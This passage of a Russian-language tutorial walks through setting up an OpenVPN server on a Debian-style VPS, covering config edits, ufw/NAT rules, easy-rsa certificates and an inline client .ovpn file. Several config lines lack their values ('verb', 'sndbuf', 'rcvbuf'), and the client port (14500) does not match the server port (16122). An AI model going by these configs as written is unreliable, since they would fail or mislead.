  &lt;p&gt;-p 1488 — порт SSH, который вы указывали в /etc/ssh/sshd_config user — пользователь, отличный от root. Под рутом не получится подключиться.&lt;/p&gt;
  &lt;p&gt;Если у вас винда, то в PUTTY/KITTY тоже меняете порт. Теперь вы будете коннектиться по SSH на сервер через этого юзера. У него нет почти никаких прав, он даже не суперпользователь. Поэтому, для того чтобы производить какие-то манипуляции на сервера, нужно залогиниться под рутом. Для этого под обычным юзером вводим:&lt;/p&gt;
  &lt;pre&gt;su -
&lt;/pre&gt;
  &lt;p&gt;И вводим пароль от root. Все — можете делать что хотите. Чтобы выйти из-под рута, вводите exit.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Поднимаем OpenVPN вручную&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Итак, собственно, поднимаем OpenVPN-server.&lt;/p&gt;
  &lt;p&gt;Начнем с установки каких-то пакетов. Некоторые из них вы уже могли ставить, если производили первичную настройку из раздела выше.&lt;/p&gt;
  &lt;p&gt;Обновим систему:&lt;/p&gt;
  &lt;pre&gt;apt-get update &amp;amp;amp;&amp;amp;amp; apt-get dist-upgrade -y
apt-get install -y sudo nano htop curl perl python wget git openssl ca-certificates iptables
&lt;/pre&gt;
  &lt;p&gt;И три основных пакета:&lt;/p&gt;
  &lt;pre&gt;apt-get install -y openvpn easy-rsa ufw
&lt;/pre&gt;
  &lt;p&gt;После установки пакетов, разархивируем пример конфигурационного файла в папку /etc/openvpn/:&lt;/p&gt;
  &lt;pre&gt;gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz &amp;amp;gt; /etc/openvpn/server.conf
&lt;/pre&gt;
  &lt;p&gt;Файл /etc/openvpn/server.conf — основной серверный конфигурационный файл OpenVPN.&lt;/p&gt;
  &lt;p&gt;Теперь немного отредактируем его:&lt;/p&gt;
  &lt;pre&gt;nano /etc/openvpn/server.conf
&lt;/pre&gt;
  &lt;p&gt;Файл длиный, с большим количесвом комментариев (все, что идет в строчке после символа # — комментарий). Строки, которые начинаются с символа ; в данном файле — тоже комментарии.&lt;/p&gt;
  &lt;p&gt;Частичный разбор конфига будет ниже в статье.&lt;/p&gt;
  &lt;p&gt;Редактируем. В самом верху сразу будет port:&lt;/p&gt;
  &lt;pre&gt;port 1194
&lt;/pre&gt;
  &lt;p&gt;Я поменяю порт на какой-нибудь совсем не стандартный:&lt;/p&gt;
  &lt;pre&gt;port 16122
&lt;/pre&gt;
  &lt;p&gt;(Диапазон от 0 до 65000), я выбрал рандомно. Не займите порт, который слушает другой сервис, например в моем случае sshd случает 1488.&lt;/p&gt;
  &lt;p&gt;Идем дальше. Выбираем протокол — пара строк ниже:&lt;/p&gt;
  &lt;pre&gt;proto udp
&lt;/pre&gt;
  &lt;p&gt;И видим, что она никак не закоментированная. Потому что по-умолчанию OpenVPN будет работать по UDP. Если вам нужен TCP, выше есть строчка proto tcp — раскоментируйте ее, удалите символ ; в нчале строки, а proto udp закоментируйте, добавив символ #. Оба нельзя, или то или другое. Я буду показывать на примере UDP, поэтому оставляю как есть.&lt;/p&gt;
  &lt;p&gt;Опускаемся ниже в конфиге и находим строку:&lt;/p&gt;
  &lt;pre&gt;dh dh1024.pem
&lt;/pre&gt;
  &lt;p&gt;Меняем на dh2048.pem:&lt;/p&gt;
  &lt;pre&gt;dh dh2048.pem
&lt;/pre&gt;
  &lt;p&gt;Идем ниже и находим закоментированную строку:&lt;/p&gt;
  &lt;pre&gt;;push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Раскоментируем:&lt;/p&gt;
  &lt;pre&gt;push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Еще чуть ниже находим две раскоментированные строки рядом:&lt;/p&gt;
  &lt;pre&gt;push &amp;quot;dhcp-option DNS 208.67.222.222&amp;quot;
push &amp;quot;dhcp-option DNS 208.67.220.220&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Это то, какой DNS будет использоваться. По-умолчанию прописаны сервера OpenDNS, но можем прописать публичные сервера Google:&lt;/p&gt;
  &lt;pre&gt;push &amp;quot;dhcp-option DNS 8.8.8.8&amp;quot;
push &amp;quot;dhcp-option DNS 8.8.4.4&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Можете оставить и OpenDNS.&lt;/p&gt;
  &lt;p&gt;Идем дальше и натыкаемся на строку&lt;/p&gt;
  &lt;pre&gt;;tls-auth ta.key  # This file is secret
&lt;/pre&gt;
  &lt;p&gt;Просто раскоментируем:&lt;/p&gt;
  &lt;pre&gt;tls-auth ta.key  # This file is secret
&lt;/pre&gt;
  &lt;p&gt;Листаем ниже и находим строку:&lt;/p&gt;
  &lt;pre&gt;;cipher AES-128-CBC   # AES
&lt;/pre&gt;
  &lt;p&gt;Это шифрование. Раскоментируем строку и переделаем на AES-256-CBC:&lt;/p&gt;
  &lt;pre&gt;cipher AES-256-CBC
&lt;/pre&gt;
  &lt;p&gt;Еще чуть ниже в файле находим две закоментированные строки:&lt;/p&gt;
  &lt;pre&gt;;user nobody
;group nogroup
&lt;/pre&gt;
  &lt;p&gt;Раскоментим их:&lt;/p&gt;
  &lt;pre&gt;user nobody
group nogroup
&lt;/pre&gt;
  &lt;p&gt;Далее, ниже находим строку, которая начинается со слова status и переделываем ее в следующий вид:&lt;/p&gt;
  &lt;pre&gt;#status /dev/null 2&amp;amp;gt;&amp;amp;amp;1
&lt;/pre&gt;
  &lt;p&gt;Закоментированная.&lt;/p&gt;
  &lt;p&gt;Еще чуть ниже, находим строку, которая начинается со слова log, и придаем ей такой вид:&lt;/p&gt;
  &lt;pre&gt;log /dev/null 2&amp;amp;gt;&amp;amp;amp;1
&lt;/pre&gt;
  &lt;p&gt;Не закоментированная. Это логи. Отключить логирование OpenVPN нельзя в привычном понимании, поскольку если закоментировать строку, то по-умолчанию будет писаться в syslog файл (/var/log/syslog).&lt;/p&gt;
  &lt;p&gt;Строку&lt;/p&gt;
  &lt;pre&gt;;log-append
&lt;/pre&gt;
  &lt;p&gt;не трогаем&lt;/p&gt;
  &lt;p&gt;Еще чуть ниже, verb 3 меняем на:&lt;/p&gt;
  &lt;pre&gt;verb 
&lt;/pre&gt;
  &lt;p&gt;Сохраняем, закрываем. Мы еще вернемся к этому файлу позже.&lt;/p&gt;
  &lt;p&gt;Теперь включаем перенаправление пакетов, вводим команду:&lt;/p&gt;
  &lt;pre&gt;echo 1 &amp;amp;gt; /proc/sys/net/ipv4/ip_forward
&lt;/pre&gt;
  &lt;p&gt;Затем:&lt;/p&gt;
  &lt;pre&gt;cat /proc/sys/net/ipv4/ip_forward
&lt;/pre&gt;
  &lt;p&gt;Если возвращает единицу, значит все ОК.&lt;/p&gt;
  &lt;p&gt;Теперь надо чтобы изменения были и при перезагрузке сервера, поэтому редактирум файл /etc/sysctl.conf:&lt;/p&gt;
  &lt;pre&gt;nano /etc/sysctl.conf
&lt;/pre&gt;
  &lt;p&gt;Ищем строку:&lt;/p&gt;
  &lt;pre&gt;#net.ipv4.ip_forward=1
&lt;/pre&gt;
  &lt;p&gt;Раскоментируем ее:&lt;/p&gt;
  &lt;pre&gt;net.ipv4.ip_forward=1
&lt;/pre&gt;
  &lt;p&gt;Если такой строки в файле нет вообще, добавьте вручную.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Настроим Firewall&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Ранее мы установили пакет ufw. Теперь нам нужно добавить некоторые правила. Во-первых, нам нужно дать разрешить траффик на SSH. Я ввожу:&lt;/p&gt;
  &lt;pre&gt;ufw allow 1488
&lt;/pre&gt;
  &lt;p&gt;Поскольку у меня sshd слушает порт 1488, если вы не меняли и у вас sshd слушает 22 порт, то вводите:&lt;/p&gt;
  &lt;pre&gt;ufw allow ssh
&lt;/pre&gt;
  &lt;p&gt;Далее, нам нужно разрешить траффик на порт, который будет слушать OpenVPN, в моем случае это port 16122, потому что я менял его в конфиг. файле (выше):&lt;/p&gt;
  &lt;pre&gt;ufw allow 16122/udp
&lt;/pre&gt;
  &lt;p&gt;Поскольку OpenVPN будет слушать UDP порт, я в конце добавил /udp. Если у вас OpenVPN настроен не на UDP, а на TCP, без слеша на конце (или /tcp).&lt;/p&gt;
  &lt;p&gt;Если вы ничего не меняли в конфиге, то у вас слушает порт 1194 UDP, а значит:&lt;/p&gt;
  &lt;pre&gt;ufw allow 1194/udp
&lt;/pre&gt;
  &lt;p&gt;Теперь нужно изменить Forward Policy, редактируем файл /etc/default/ufw:&lt;/p&gt;
  &lt;pre&gt;nano /etc/default/ufw
&lt;/pre&gt;
  &lt;p&gt;Ищем строку:&lt;/p&gt;
  &lt;pre&gt;DEFAULT_FORWARD_POLICY=&amp;quot;DROP&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;И меняем ее значение на:&lt;/p&gt;
  &lt;pre&gt;DEFAULT_FORWARD_POLICY=&amp;quot;ACCEPT&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Теперь нам нужно разобраться с сетевыми интерфейсами, вводим команду:&lt;/p&gt;
  &lt;pre&gt;ip addr
&lt;/pre&gt;
  &lt;p&gt;Команда выведет ваши интерфейсы. Там будет интерфейс lo и еще какой-нибудь, например eth0 или venet0. В моем случае интерфейс называется venet0 (ибо OpenVZ). У меня такой вывод:&lt;/p&gt;
  &lt;pre&gt;1: lo: &amp;amp;lt;LOOPBACK,UP,LOWER_UP&amp;amp;gt; mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
2: venet0: &amp;amp;lt;BROADCAST,POINTOPOINT,NOARP,UP,LOWER_UP&amp;amp;gt; mtu 1500 qdisc noqueue state UNKNOWN 
    link/void 
    inet 127.0.0.2/32 scope host venet0
    inet МОЙ IP/32 brd МОЙ IP scope global venet0:
&lt;/pre&gt;
  &lt;p&gt;Вам нужен интерфейс, который показывает ваш внешний IP. Из кода выше понятно, что venet0 показывает внешний IP. (inet МОЙ IP)&lt;/p&gt;
  &lt;p&gt;Далее, что нужно редактировать файл /etc/ufw/before.rules:&lt;/p&gt;
  &lt;pre&gt;nano /etc/ufw/before.rules
&lt;/pre&gt;
  &lt;p&gt;И куда-нибудь наверх, вставляем следующее:&lt;/p&gt;
  &lt;pre&gt;# START
*nat
:POSTROUTING ACCEPT [:]
-A POSTROUTING -s 10.8.0.0/8 -o &amp;amp;lt;ВАШ ИНТЕРФЕЙС&amp;amp;gt; -j MASQUERADE
COMMIT
# END
&lt;/pre&gt;
  &lt;p&gt;где вместо &amp;lt;ВАШ ИНТЕРФЕЙС&amp;gt; пишем интерфейс, в моем случае это venet0 и получилось так:&lt;/p&gt;
  &lt;pre&gt;# START
*nat
:POSTROUTING ACCEPT [:]
-A POSTROUTING -s 10.8.0.0/8 -o venet0 -j MASQUERADE
COMMIT
# END
&lt;/pre&gt;
  &lt;p&gt;После всего этого включаем ufw:&lt;/p&gt;
  &lt;pre&gt;ufw enable
&lt;/pre&gt;
  &lt;p&gt;Cмотрим на наши правила:&lt;/p&gt;
  &lt;pre&gt;ufw status
&lt;/pre&gt;
  &lt;p&gt;Выводом покажет правила, которые вы создавали выше, у меня так:&lt;/p&gt;
  &lt;pre&gt;root@ppVPS:~# ufw status
Status: active

To                  Action      From
--                  ------      ----
1488                ALLOW       Anywhere
16122/udp           ALLOW       Anywhere
1488                ALLOW       Anywhere (v6)
16122/udp           ALLOW       Anywhere (v6)
&lt;/pre&gt;
  &lt;p&gt;где 1488 — для SSH и 16122 — UDP опенвпн.&lt;/p&gt;
  &lt;p&gt;Отключить ufw можно так:&lt;/p&gt;
  &lt;pre&gt;ufw disable
&lt;/pre&gt;
  &lt;p&gt;Генерируем ключи для сервера. Ранее мы ставили пакет easy-rsa. Теперь копируем папку со скриптами easy-rsa в папку openvpn:&lt;/p&gt;
  &lt;pre&gt;cp -r /usr/share/easy-rsa/ /etc/openvpn
&lt;/pre&gt;
  &lt;p&gt;внутри папки easy-rsa создаем папку keys:&lt;/p&gt;
  &lt;pre&gt;mkdir /etc/openvpn/easy-rsa/keys
&lt;/pre&gt;
  &lt;p&gt;Теперь сгенерируем Diffie-Hellman длиной 2048 и поместим его в /etc/openvpn:&lt;/p&gt;
  &lt;pre&gt;openssl dhparam -out /etc/openvpn/dh2048.pem 2048
&lt;/pre&gt;
  &lt;p&gt;Еще сгенерируем файл ta.key в папку /etc/openvpn, для tls-auth:&lt;/p&gt;
  &lt;pre&gt;openvpn --genkey --secret /etc/openvpn/ta.key
&lt;/pre&gt;
  &lt;p&gt;Далее…&lt;/p&gt;
  &lt;p&gt;Переходим в папку easy-rsa:&lt;/p&gt;
  &lt;pre&gt;cd /etc/openvpn/easy-rsa
&lt;/pre&gt;
  &lt;p&gt;Тут лежит файл vars с какими-то переменными, редактируем его:&lt;/p&gt;
  &lt;pre&gt;nano vars
&lt;/pre&gt;
  &lt;p&gt;Крутим вниз пока не наткнемся на блок:&lt;/p&gt;
  &lt;pre&gt;export KEY_COUNTRY=&amp;quot;US&amp;quot;
export KEY_PROVINCE=&amp;quot;CA&amp;quot;
export KEY_CITY=&amp;quot;SanFrancisco&amp;quot;
export KEY_ORG=&amp;quot;Fort-Funston&amp;quot;
export KEY_EMAIL=&amp;quot;me@myhost.mydomain&amp;quot;
export KEY_OU=&amp;quot;MyOrganizationalUnit&amp;quot;

# X509 Subject Field
export KEY_NAME=&amp;quot;EasyRSA&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;В первых 6 строках можете менять значения, можете оставить как есть. Я оставлю как есть. Пофиг. Главное нельзя оставлять их пустыми.&lt;/p&gt;
  &lt;p&gt;Но конкретно здесь нас интересует строка&lt;/p&gt;
  &lt;pre&gt;export KEY_NAME=&amp;quot;EasyRSA&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Здесь значение меняем на server, что бы было вот так:&lt;/p&gt;
  &lt;pre&gt;export KEY_NAME=&amp;quot;server&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Можно поменять на любое другое, но не ебем мозг и меняем как я, потому что иначе вам придется менять значения в server.conf.&lt;/p&gt;
  &lt;p&gt;Если дали название отличное от server — запомните его.&lt;/p&gt;
  &lt;p&gt;Вот так. Сохраняем, закрываем файл.&lt;/p&gt;
  &lt;p&gt;Далее вводим следующее:&lt;/p&gt;
  &lt;pre&gt;source vars
&lt;/pre&gt;
  &lt;p&gt;Далее, вводим:&lt;/p&gt;
  &lt;pre&gt;./clean-all &amp;amp;amp;&amp;amp;amp; ./build-ca
&lt;/pre&gt;
  &lt;p&gt;Будет предлогать вводить какие-то значения, но мы их меняли (или не меняли) в файле vars. Просто везде жмем Enter и все. При этом, дойдя до пункта Name, нажимая Enter будет то имя, которое вы указывали ранее в KEY_NAME у меня это server.&lt;/p&gt;
  &lt;p&gt;Следующим делом вводим:&lt;/p&gt;
  &lt;pre&gt;./build-key-server &amp;amp;lt;ИМЯ В KEY_NAME&amp;amp;gt;
&lt;/pre&gt;
  &lt;p&gt;где: &amp;lt;ИМЯ В KEY_NAME&amp;gt; — это то имя, которое вы давали в файле vars. Если ничего не давали, то по-умолчанию там было Easy-RSA. Я давал имя server, поэтому:&lt;/p&gt;
  &lt;pre&gt;./build-key-server server
&lt;/pre&gt;
  &lt;p&gt;Точно таким же образом, везде жмем Enter. Даже там, где предложит ввести ‘A challenge password’, жмем enter.&lt;/p&gt;
  &lt;p&gt;Потом дважды вводим символ y, где попросит:&lt;/p&gt;
  &lt;p&gt;Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y&lt;/p&gt;
  &lt;p&gt;В конце вы увидите:&lt;/p&gt;
  &lt;p&gt;Write out database with 1 new entries Data Base Updated&lt;/p&gt;
  &lt;p&gt;Теперь нам нужно переместить все сгенерированные ключи и сертификаты в папку /etc/openvpn.&lt;/p&gt;
  &lt;p&gt;Всё добро находится в папке /etc/oepnvpn/easy-rsa/keys. Нас интересуют 3 файла (исплючая dh2048.pem и ta.key, которые мы сгенерировали ранее) — ca.crt, server.crt, server.key,&lt;/p&gt;
  &lt;p&gt;где файлы server.crt и server.key — имеют название, которое вы указывали в KEY_NAME, я указывал server, помним да.&lt;/p&gt;
  &lt;p&gt;Перемещаем их следующим образом:&lt;/p&gt;
  &lt;pre&gt;cp /etc/openvpn/easy-rsa/keys/{ca.crt,server.crt,server.key} /etc/openvpn/
&lt;/pre&gt;
  &lt;p&gt;Идем обратно в папку openvpn:&lt;/p&gt;
  &lt;pre&gt;cd /etc/openvpn
&lt;/pre&gt;
  &lt;p&gt;Вводим к консоли ls и смотрим, какие файлы лежат. На данный момент должны быть следующие файлы: ca.crt, dh2048.pem (который мы генерировали ранее), server.conf (основной конфиг), server.crt, server.key и ta.key Еще может быть файл update-resolv-conf.&lt;/p&gt;
  &lt;pre&gt;root@ppVPS:/etc/openvpn# ls
ca.crt	dh2048.pem  easy-rsa  server.conf  server.crt  server.key  update-resolv-conf
&lt;/pre&gt;
  &lt;p&gt;Теперь запускаем openvpn:&lt;/p&gt;
  &lt;pre&gt;systemctl start openvpn
&lt;/pre&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;pre&gt;/etc/init.d/openvpn start
&lt;/pre&gt;
  &lt;p&gt;Проверяем, запустился ли:&lt;/p&gt;
  &lt;pre&gt;systemctl status openvpn
&lt;/pre&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;pre&gt;/etc/init.d/openvpn status
&lt;/pre&gt;
  &lt;p&gt;Должно гореть зелененьким (лол), вы увидите надпись:&lt;/p&gt;
  &lt;pre&gt;Active: active (exited) since
&lt;/pre&gt;
  &lt;p&gt;Проверяем, слушает ли порт:&lt;/p&gt;
  &lt;pre&gt;netstat -tulpn | grep vpn
&lt;/pre&gt;
  &lt;p&gt;Должно вывести один сервис, который слушает на порту, который вы указывали.&lt;/p&gt;
  &lt;p&gt;У меня вывод такой:&lt;/p&gt;
  &lt;pre&gt;udp      0.0.0.0:16122   0.0.0.0:*     484/openvpn
&lt;/pre&gt;
  &lt;p&gt;Все проверили, молодцы. Теперь остановим:&lt;/p&gt;
  &lt;pre&gt;systemctl stop openvpn
&lt;/pre&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;pre&gt;/etc/init.d/openvpn stop
&lt;/pre&gt;
  &lt;p&gt;Делаем клиента, генерируем ключи.&lt;/p&gt;
  &lt;p&gt;Для начала нам нужно скопировать пример конфиг. файла для клиента. Скопируем его в папочку /etc/openvpn/easy-rsa/keys и переименуем (даем расширение .ovpn):&lt;/p&gt;
  &lt;pre&gt;cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn/easy-rsa/keys/client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Редактируем файл клиента:&lt;/p&gt;
  &lt;pre&gt;nano /etc/openvpn/easy-rsa/keys/client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Листаем файл вниз, натыкаемся на строку&lt;/p&gt;
  &lt;pre&gt;remote my-server-1 1194
&lt;/pre&gt;
  &lt;p&gt;где: my-server-1 — IP адрес вашего сервера. Тот, что пришел вам на почту или смотрите по команде ip addr | grep inet и ищите. 1194 — Порт, на котором слушает OpenVPN на вашем сервере, в моем случа это 16122.&lt;/p&gt;
  &lt;p&gt;Меняйте эту строку, я меняю:&lt;/p&gt;
  &lt;pre&gt;remote 111.222.111.222 16122
&lt;/pre&gt;
  &lt;p&gt;Листаем ниже, находим строку:&lt;/p&gt;
  &lt;pre&gt;ns-cert-type server
&lt;/pre&gt;
  &lt;p&gt;стираем ее и меняем на:&lt;/p&gt;
  &lt;pre&gt;remote-cert-tls server
&lt;/pre&gt;
  &lt;p&gt;Еще чуть ниже строка:&lt;/p&gt;
  &lt;pre&gt;;cipher x
&lt;/pre&gt;
  &lt;p&gt;Меняем шифрование на то, которое вы указывали в server.conf. Я указывал AES-256-CBC:&lt;/p&gt;
  &lt;pre&gt;cipher AES-256-CBC
&lt;/pre&gt;
  &lt;p&gt;Если вы в server.conf ничего не указывали, то эту строку не трогайте.&lt;/p&gt;
  &lt;p&gt;Все. Сохраняем и закрываем.&lt;/p&gt;
  &lt;p&gt;Теперь нужно сгенерировать ключи и серты для клиента.&lt;/p&gt;
  &lt;p&gt;Перейдем в папку easy-rsa:&lt;/p&gt;
  &lt;pre&gt;cd /etc/openvpn/easy-rsa
&lt;/pre&gt;
  &lt;p&gt;Генерим:&lt;/p&gt;
  &lt;pre&gt;./build-key client1
&lt;/pre&gt;
  &lt;p&gt;где: client1 — название клиента. Может быть любым. Я сделал client1.&lt;/p&gt;
  &lt;p&gt;Таким же образом, как и с сервом, везде жмем Enter. И соглашаемся, нажимая y, там где это нужно.&lt;/p&gt;
  &lt;p&gt;Клиентский конфиг состоит из:&lt;/p&gt;
  &lt;p&gt;.ovpn файла. В моем случае это client.ovpn.&lt;/p&gt;
  &lt;p&gt;файла ca.crt — который общий для сервера и все клиентов.&lt;/p&gt;
  &lt;p&gt;файл ta.key — тоже общий для сервера и клиента. Это для tls-auth, что не обязательно.&lt;/p&gt;
  &lt;p&gt;файлов client1.crt и client1.key — которые индивидуальные для каждого клиента.&lt;/p&gt;
  &lt;p&gt;Дело в том, что все эти файлы нужны .ovpn конфигу, без них он не будет работать. Но не будем же мы их везде вместе таскать! Поэтому есть возможность все эти файлы строить в .ovpn конфиг, чтобы был один единый файл и все.&lt;/p&gt;
  &lt;p&gt;Нужно проделать кое-какие манипуляции, поэтому для удобства создаем папку client1:&lt;/p&gt;
  &lt;pre&gt;mkdir /etc/openvpn/easy-rsa/keys/client1
&lt;/pre&gt;
  &lt;p&gt;Нужно скопировать туда конфиг.файл .ovpn и все серты и ключи, по аналогии с сервером, файлы client1.crt и client1.key имеют названия специфические, в зависимости от того, какое вы указывали имя клиента, выполняя команду выше. Я назвал client1 поэтому у меня они называются именно так.&lt;/p&gt;
  &lt;p&gt;Копируем:&lt;/p&gt;
  &lt;pre&gt;cp /etc/openvpn/easy-rsa/keys/{ca.crt,client1.crt,client1.key} /etc/openvpn/easy-rsa/keys/client1
&lt;/pre&gt;
  &lt;p&gt;За одно копируем client.ovpn (называться может как угодно, хоть xuy.ovpn):&lt;/p&gt;
  &lt;pre&gt;cp /etc/openvpn/easy-rsa/keys/client.ovpn /etc/openvpn/easy-rsa/keys/client1
&lt;/pre&gt;
  &lt;p&gt;И не забываем про ta.key, которые лежит в папке openvpn:&lt;/p&gt;
  &lt;pre&gt;cp /etc/openvpn/ta.key /etc/openvpn/easy-rsa/keys/client1/
&lt;/pre&gt;
  &lt;p&gt;Переходим в папку client1:&lt;/p&gt;
  &lt;pre&gt;cd /etc/openvpn/easy-rsa/keys/client1
&lt;/pre&gt;
  &lt;p&gt;На данный момент там находится 5 файлов:&lt;/p&gt;
  &lt;pre&gt;ca.crt client.ovpn (конфиг файл) client1.crt client1.key ta.key
&lt;/pre&gt;
  &lt;p&gt;Теперь нужно быть внимательнее! В особенности с именами файлов. Внедряем содержимое нужных файлов в наш конфиг .ovpn.&lt;/p&gt;
  &lt;p&gt;По очереди, в том порядке, в котором это у меня, выполняем следующие команды.&lt;/p&gt;
  &lt;p&gt;Для ca.crt:&lt;/p&gt;
  &lt;pre&gt;echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
cat ca.crt &amp;amp;gt;&amp;amp;gt; client.ovpn
echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
&lt;/pre&gt;
  &lt;p&gt;где client.ovpn название конфиг файла.&lt;/p&gt;
  &lt;p&gt;Теперь для client1.crt:&lt;/p&gt;
  &lt;pre&gt;echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
cat client1.crt &amp;amp;gt;&amp;amp;gt; client.ovpn
echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
&lt;/pre&gt;
  &lt;p&gt;где client1.crt — серт. файл, которые генерировали выше.&lt;/p&gt;
  &lt;p&gt;Теперь для client1.key:&lt;/p&gt;
  &lt;pre&gt;echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
cat client1.key &amp;amp;gt;&amp;amp;gt; client.ovpn
echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Теперь для ta.key, нужно для tls-auth:&lt;/p&gt;
  &lt;pre&gt;echo &amp;#x27;key-direction 1&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
cat ta.key &amp;amp;gt;&amp;amp;gt; client.ovpn
echo &amp;#x27;&amp;#x27; &amp;amp;gt;&amp;amp;gt; client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Таким образом, все ключи и сертификаты теперь в одном файле .ovpn, и он может работать сам по себе.&lt;/p&gt;
  &lt;p&gt;Теперь нужно еще немного отредактировать файл client.ovpn:&lt;/p&gt;
  &lt;pre&gt;nano client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Листаем, пока не наткнемся на блок:&lt;/p&gt;
  &lt;pre&gt;ca ca.crt
cert client.crt
key client.key
&lt;/pre&gt;
  &lt;p&gt;Нам это не нужно, поэтому закоментируем их:&lt;/p&gt;
  &lt;pre&gt;#ca ca.crt
#cert client.crt
#key client.key
&lt;/pre&gt;
  &lt;p&gt;Собственно, конфиг клиента готов. Он будет работать, если вы запустите его на OpenVPN клиенте вашего устройства.&lt;/p&gt;
  &lt;p&gt;Можем запускать OpenVPN:&lt;/p&gt;
  &lt;pre&gt;systemctl start openvpn
&lt;/pre&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;pre&gt;/etc/init.d/openvpn start
&lt;/pre&gt;
  &lt;p&gt;После любых манупуляций в файле server.conf, для того что бы применились изменения, нужно перезапускать OpenVPN:&lt;/p&gt;
  &lt;pre&gt;systemctl restart openvpn
&lt;/pre&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;pre&gt;/etc/init.d/openvpn restart
&lt;/pre&gt;
  &lt;p&gt;Но я хочу еще проделать какие-то модификации на server.conf и client.ovpn&lt;/p&gt;
  &lt;p&gt;Для начала я хотел бы привести оба конфига в более читабельный и простой вид, а именно, удалить все комментарии и пустые строки.&lt;/p&gt;
  &lt;p&gt;Сделать это легко. Но для начала, на всякий случай, сделаем backup:&lt;/p&gt;
  &lt;pre&gt;server.conf

cp /etc/openvpn/server.conf /etc/openvpn/server.conf.bak
&lt;/pre&gt;
  &lt;p&gt;и client.ovpn:&lt;/p&gt;
  &lt;pre&gt;cp /etc/openvpn/easy-rsa/keys/client1/client.ovpn /etc/openvpn/easy-rsa/keys/client1/client.ovpn.bak
&lt;/pre&gt;
  &lt;p&gt;теперь одной командой удаляем все комментарии (# и ; в начале строки) и пустые строки:&lt;/p&gt;
  &lt;pre&gt;server.conf

sed -i &amp;#x27;/^[#;]\|^$/ d&amp;#x27; /etc/openvpn/server.conf

client.ovpn

sed -i &amp;#x27;/^[#;]\|^$/ d&amp;#x27; /etc/openvpn/easy-rsa/keys/client1/client.ovpn
&lt;/pre&gt;
  &lt;p&gt;И оба наших конфига примут более читабельный вид.&lt;/p&gt;
  &lt;p&gt;Открываем server.conf&lt;/p&gt;
  &lt;pre&gt;nano /etc/openvpn/server.conf
&lt;/pre&gt;
  &lt;p&gt;И куда-нибудь в середину прихерачим следующее:&lt;/p&gt;
  &lt;pre&gt;sndbuf 
rcvbuf 
topology subnet
auth SHA512
&lt;/pre&gt;
  &lt;p&gt;И на клиенте.&lt;/p&gt;
  &lt;pre&gt;nano /etc/openvpn/easy-rsa/keys/client1/client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Куда-нибудь в конфиг, до начала сертификатов и ключей:&lt;/p&gt;
  &lt;pre&gt;sndbuf 
rcvbuf 
keepalive 10 120
auth SHA512
&lt;/pre&gt;
  &lt;p&gt;Таким образом, мой конфиг server.conf выглядит так:&lt;/p&gt;
  &lt;pre&gt;port 16122
proto udp
dev tun
sndbuf 
rcvbuf 
ca ca.crt
cert server.crt
key server.key  # This file should be kept secret
dh dh2048.pem
tls-auth ta.key 
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot;
push &amp;quot;dhcp-option DNS 8.8.8.8&amp;quot;
push &amp;quot;dhcp-option DNS 8.8.4.4&amp;quot;
keepalive 10 120
cipher AES-256-CBC
auth SHA512
comp-lzo
persist-key
persist-tun
log /dev/null 2&amp;amp;gt;&amp;amp;amp;1
verb 
&lt;/pre&gt;
  &lt;p&gt;А client.ovpn так (Безключей и сертификатов):&lt;/p&gt;
  &lt;pre&gt;client
dev tun
proto udp
sndbuf 
rcvbuf 
remote 111.222.111.222 14500
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
auth SHA512
keepalive 10 120
comp-lzo
verb 3
&lt;/pre&gt;
  &lt;p&gt;Можете использовать эти конфиги.&lt;/p&gt;
  &lt;p&gt;Разберем немного конфиг.&lt;/p&gt;
  &lt;pre&gt;proto udp
&lt;/pre&gt;
  &lt;p&gt;Какой протокол юзать, TCP или UDP?&lt;/p&gt;
  &lt;p&gt;UDP обычно работает быстрее.&lt;/p&gt;
  &lt;p&gt;TCP более надежный, стабильный, лучше обходит фаерволл — например можно повестить на порт 443.&lt;/p&gt;
  &lt;p&gt;UDP, также можно повесить на порт, который обычно не блокируют — 53.&lt;/p&gt;
